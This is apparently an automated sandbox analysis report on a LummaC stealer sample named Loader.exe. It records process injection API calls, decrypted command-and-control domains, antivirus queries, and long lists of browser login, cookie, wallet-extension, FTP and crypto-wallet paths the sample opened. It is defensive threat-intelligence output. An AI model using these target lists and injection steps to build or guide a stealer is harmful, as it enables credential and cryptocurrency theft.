Code function: 0_2_00CF019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00CF019E

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Loader.exe

Memory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: stingyerasjhru.click

Source: C:\Users\user\Desktop\Loader.exe

Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00CDB0C5
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00CD68FD
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00CDB1B7
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00CDB110
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00CDB2BD
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00CDAA37
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00CD63F5
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00CDAC88
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00CDAD30
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00CDAFF0
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00CDAF83
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	3_2_00CDB0C5
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	3_2_00CD68FD
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00CDB1B7
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	3_2_00CDB110
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	3_2_00CDB2BD
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00CDAA37
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	3_2_00CD63F5
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	3_2_00CDAC88
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_00CDAD30
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	3_2_00CDAFF0
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	3_2_00CDAF83

Source: C:\Users\user\Desktop\Loader.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00CCA335 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00CCA335

Source: C:\Users\user\Desktop\Loader.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Loader.exe, 00000003.00000003.91118614146.0000000003402000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.000000000338C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103143578.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118175734.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778448742.00000000033F5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Loader.exe PID: 1980, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Loader.exe, 00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ets/Electrum-LTC
Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Loader.exe, 00000003.00000003.91074807560.000000000342F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Chrome/Default/Extensions/Jaxx Liberty.
Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Loader.exe, 00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Loader.exe, 00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Loader.exe, 00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
